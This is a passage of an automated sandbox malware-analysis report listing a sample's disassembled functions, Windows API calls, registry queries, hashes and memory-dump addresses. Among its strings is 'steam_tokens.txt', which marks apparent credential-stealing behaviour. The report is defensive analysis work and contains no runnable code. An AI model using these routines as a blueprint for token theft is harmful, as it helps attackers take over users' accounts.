                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: 707ad9dde531a539b2a94b234f37cfcdcab04a209bc29e9c85366b691a133d54
                                  • Instruction ID: 4a7ce45a553d3e50f6280293f8011c4515157a79d2deddaf4ce85b503fa0ed43
                                  • Opcode Fuzzy Hash: 707ad9dde531a539b2a94b234f37cfcdcab04a209bc29e9c85366b691a133d54
                                  • Instruction Fuzzy Hash: 66319131A101565BC762FFB9ED4AA9E77A9AF40310F040034F846EB202DB2CDC05BBD1
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00FB140E), ref: 00FB9A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00FB140E), ref: 00FB9AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,00FB140E), ref: 00FB9AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,00FB140E,00000000,?,?,?,00FB140E), ref: 00FB9AE0
                                  • LocalFree.KERNEL32(?,?,?,?,00FB140E), ref: 00FB9B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,00FB140E), ref: 00FB9B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 674b19808d3928b60f24bdbc3eb2e327e87277c2a412fbfed44c4184d6fd916d
                                  • Instruction ID: 5a6432bd95bbbc39fcb91cb9450e6759ba7a2cf44d2ee126732b20a730be5599
                                  • Opcode Fuzzy Hash: 674b19808d3928b60f24bdbc3eb2e327e87277c2a412fbfed44c4184d6fd916d
                                  • Instruction Fuzzy Hash: D7112171A04209AFD724DFE9DC84AEA77ACEB44754F104169FA11DA180D774DE40DFA1
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5B14
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00FD5B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 00FD5B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 00FD5B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: 9edfb5a498ffc343a1d51678bbaf4b5402a7457cc2802740f73780bc96674a05
                                  • Instruction ID: fb6db192c09c9914497c23e596ac7fcde1084470337d7238a24f06cf197b49d8
                                  • Opcode Fuzzy Hash: 9edfb5a498ffc343a1d51678bbaf4b5402a7457cc2802740f73780bc96674a05
                                  • Instruction Fuzzy Hash: C7416371B005199FCF18DF6CC995AAEB7F6EB88710F19822AE915E7344D634DD01CB90
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7D58
                                    • Part of subcall function 00FDA1C0: std::exception::exception.LIBCMT ref: 00FDA1D5
                                    • Part of subcall function 00FDA1C0: std::exception::exception.LIBCMT ref: 00FDA1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: e4469236f67990287ae44fab7bede3960a2ff9303b3dc41b7915f5589d9a14fe
                                  • Instruction ID: 79ad7f59584cbe5985cc4af712dc77f0e16f66ae1991c823afee74aeab6a8c68
                                  • Opcode Fuzzy Hash: e4469236f67990287ae44fab7bede3960a2ff9303b3dc41b7915f5589d9a14fe
                                  • Instruction Fuzzy Hash: BD21B6327043018BD724EE6CD982F3AF7E5AF91760F244A6EE4528B341D771DC409B65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FD33EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD33F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00FD3411
                                  • wsprintfA.USER32 ref: 00FD3437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: 095d7ada9a5bc91852bd294525f31841de8bf01bf855ad21369b87317cf6155d
                                  • Instruction ID: aa82942257084f5c79c8edd6616c8c46c5db11050538eea35a7758b391380ba9
                                  • Opcode Fuzzy Hash: 095d7ada9a5bc91852bd294525f31841de8bf01bf855ad21369b87317cf6155d
                                  • Instruction Fuzzy Hash: 0D01F571A00208AFDB24DFD8CC45BAEB7BDEB45720F00012AFA16EB380D774990087A2
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,01B9D770,00000000,00020119,?), ref: 00FCD7F5
                                  • RegQueryValueExA.ADVAPI32(?,01B9E130,00000000,00000000,00000000,000000FF), ref: 00FCD819
                                  • RegCloseKey.ADVAPI32(?), ref: 00FCD823
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCD848
                                  • lstrcat.KERNEL32(?,01B9E1D8), ref: 00FCD85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: d25e25ce05bbd23c9cf84393ee72b1cac56fe6e3f59401905ab61f2cf7ad0fa3
                                  • Instruction ID: 988ed742f0741837fb53fd9820b9554780e77213d6d830c53fff8e817f88e101
                                  • Opcode Fuzzy Hash: d25e25ce05bbd23c9cf84393ee72b1cac56fe6e3f59401905ab61f2cf7ad0fa3
                                  • Instruction Fuzzy Hash: 7B416571A1010D9FCB68EFA4EC82FDD77B8AB94304F444074B51AA7241EB38AA85DF91
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC7F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC7F60
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC7FA5
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC7FD3
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC8007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 8b5993f4aebf33ed4937e119c44a64d7986500c65479cb5c9ab67578fe446a77
                                  • Instruction ID: 27bcfc333bf8272bfe2a94792c9e6e6c24e2adda8fff1d3ace00e84687060f55
                                  • Opcode Fuzzy Hash: 8b5993f4aebf33ed4937e119c44a64d7986500c65479cb5c9ab67578fe446a77
                                  • Instruction Fuzzy Hash: 8D419B31A0420ADFCB20EF69D581FAEBBB8FF54300B11409DE8059B245DB71AA66DF91
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC80BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC80EA
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC8102
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC816F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 3241d72eb35f3bfa9a9705828ac48fe97b71e0a0a359ce94c6e3a2cb0a3ba3ef
                                  • Instruction ID: cb237eb0cc4b5f4237bab69da2ed32c346728335a83fc47cf6683355917a1f61
                                  • Opcode Fuzzy Hash: 3241d72eb35f3bfa9a9705828ac48fe97b71e0a0a359ce94c6e3a2cb0a3ba3ef
                                  • Instruction Fuzzy Hash: 8A41A071A001079BDB21DFB8DA85FAABBF4EF44350F14846CA849D7205EF34D946DB90
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00FD1B72
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD184F
                                    • Part of subcall function 00FD1820: lstrlen.KERNEL32(01B87218), ref: 00FD1860
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1887
                                    • Part of subcall function 00FD1820: lstrcat.KERNEL32(00000000,00000000), ref: 00FD1892
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00000000), ref: 00FD18C1
                                    • Part of subcall function 00FD1820: lstrlen.KERNEL32(00FE4FA0), ref: 00FD18D3
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00000000), ref: 00FD18F4
                                    • Part of subcall function 00FD1820: lstrcat.KERNEL32(00000000,00FE4FA0), ref: 00FD1900
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00000000), ref: 00FD192F
                                  • sscanf.NTDLL ref: 00FD1B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FD1BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FD1BC6
                                  • ExitProcess.KERNEL32 ref: 00FD1BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: a820b33590444b9fd7704b7cc477a29af5aa9abdf51f4f7f05ece2c4f7a2e061
                                  • Instruction ID: 975793640a675d4ce980ef0278300fc13e689ce3fa1007b35db8d17644077e17
                                  • Opcode Fuzzy Hash: a820b33590444b9fd7704b7cc477a29af5aa9abdf51f4f7f05ece2c4f7a2e061
                                  • Instruction Fuzzy Hash: EC21E4B1518305AF8354DFA5D88485FBBF9FEC8214F408A1EF5A9C7214E730D5058BA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FD3166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,01B8C4E0,00000000,00020119,?), ref: 00FD318C
                                  • RegQueryValueExA.ADVAPI32(?,01B9D710,00000000,00000000,00000000,000000FF), ref: 00FD31A7
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD31B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: c49153bcbc7f1c53cbf06e7052c304aaf08a24f54f7f422091a4ed4e3f0cd716
                                  • Instruction ID: 4e135183952d6583df1ec68982a98a9195b59c9d2df0c92e8f9cd439b43fdb03
                                  • Opcode Fuzzy Hash: c49153bcbc7f1c53cbf06e7052c304aaf08a24f54f7f422091a4ed4e3f0cd716
                                  • Instruction Fuzzy Hash: EB118276A00209AFD724CFD4E845FABBBBCE744720F00422AFA15D7384D775594087A1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
